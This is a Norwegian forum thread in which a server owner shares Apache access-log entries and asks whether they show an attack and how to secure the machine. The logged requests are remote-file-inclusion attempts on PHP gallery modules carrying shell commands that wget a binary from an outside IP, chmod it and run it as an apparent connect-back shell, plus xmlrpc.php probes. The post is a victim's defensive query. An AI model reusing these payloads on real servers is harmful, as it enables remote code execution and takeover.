Gå til innhold

Forsøk på å utnytte web-applikasjoner til script?

Gjest Slettet+432

Av Gjest Slettet+432
i Operativsystemer

Anbefalte innlegg

Gjest Slettet+432

Gjest Slettet+432

Skrevet
Skrevet (endret)

Heisann...

 

Tenkte jeg bare skulle ta en titt i apache sin access logg....

root@sysfile:/home/aleksander# tail -f /var/log/apache/access_log

193.91.99.14 - - [09/Mar/2006:19:16:58 +0100] "GET /modules.php?op=modload&name=My_eGallerydisplayCategory.php?basepath=http://64.49.220.145/tmp.txt?&cmd=cd%20/tmp;wget%20http://64.49.220.145/cback;chmod%20744%20cback;./cback%2080.13.5.2%208080;echo%20YYY;echo|  HTTP/1.1" 404 294

193.91.99.14 - - [09/Mar/2006:19:16:59 +0100] "GET /modules.php?op=modload&name=4nAlbumdisplayCategory.php?basepath=http://64.49.220.145/tmp.txt?&cmd=cd%20/tmp;wget%20http://64.49.220.145/cback;chmod%20744%20cback;./cback%2080.13.5.2%208080;echo%20YYY;echo|  HTTP/1.1" 404 294

193.91.99.14 - - [09/Mar/2006:19:17:00 +0100] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://64.49.220.145/tmp.txt?&cmd=cd%20/tmp;wget%20http://64.49.220.145/cback;chmod%20744%20cback;./cback%2080.13.5.2%208080;echo%20YYY;echo|  HTTP/1.1" 404 325

193.91.99.14 - - [09/Mar/2006:19:17:01 +0100] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://64.49.220.145/tmp.txt?&cmd=cd%20/tmp;wget%20http://64.49.220.145/cback;chmod%20744%20cback;./cback%2080.13.5.2%208080;echo%20YYY;echo|  HTTP/1.1" 404 329

193.91.99.14 - - [09/Mar/2006:19:17:02 +0100] "GET /modules/4nAlbum/public/displayCategory.phpdisplayCategory.php?basepath=http://64.49.220.145/tmp.txt?&cmd=cd%20/tmp;wget%20http://64.49.220.145/cback;chmod%20744%20cback;./cback%2080.13.5.2%208080;echo%20YYY;echo|  HTTP/1.1" 404 344

193.91.99.14 - - [09/Mar/2006:19:17:03 +0100] "GET /modules/My_eGallery/public/displayCategory.phpdisplayCategory.php?basepath=http://64.49.220.145/tmp.txt?&cmd=cd%20/tmp;wget%20http://64.49.220.145/cback;chmod%20744%20cback;./cback%2080.13.5.2%208080;echo%20YYY;echo|  HTTP/1.1" 404 348

193.91.99.14 - - [09/Mar/2006:19:17:06 +0100] "POST /xmlrpc.php HTTP/1.1" 404 293

193.91.99.14 - - [09/Mar/2006:19:17:07 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 300

193.91.99.14 - - [09/Mar/2006:19:17:08 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 306

193.91.99.14 - - [09/Mar/2006:19:17:09 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 303

 

Ser ut som om noen har prøvd å laste opp et slags script eller noe til min server? Legg merke

til chmod kommandoene... Er dette noe jeg bør bry meg om? Isåfall, hvordan kan jeg sikre maskinen mer?

 

Edit: http://64.49.220.145/tmp.txt sjekk denne... tror noen har prøvd å laste den opp eller noe...skummelt det der! kunne fått mye info...

Endret av Slettet+432
Lenke til kommentar

Videoannonse

Videoannonse
Annonse
Gjest Slettet+432

Gjest Slettet+432

Skrevet
Skrevet

oh, det var godt. ser jeg får masse ssh innloggingsforsøk nå, er glad jeg har bare tillatt et par brukere å logge inn som ssh, og det er sterke passord på dem :)

Lenke til kommentar

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!

Start en konto

Logg inn

Har du allerede en konto? Logg inn her.

Logg inn nå
Gå til emneliste
×
×
  • Opprett ny...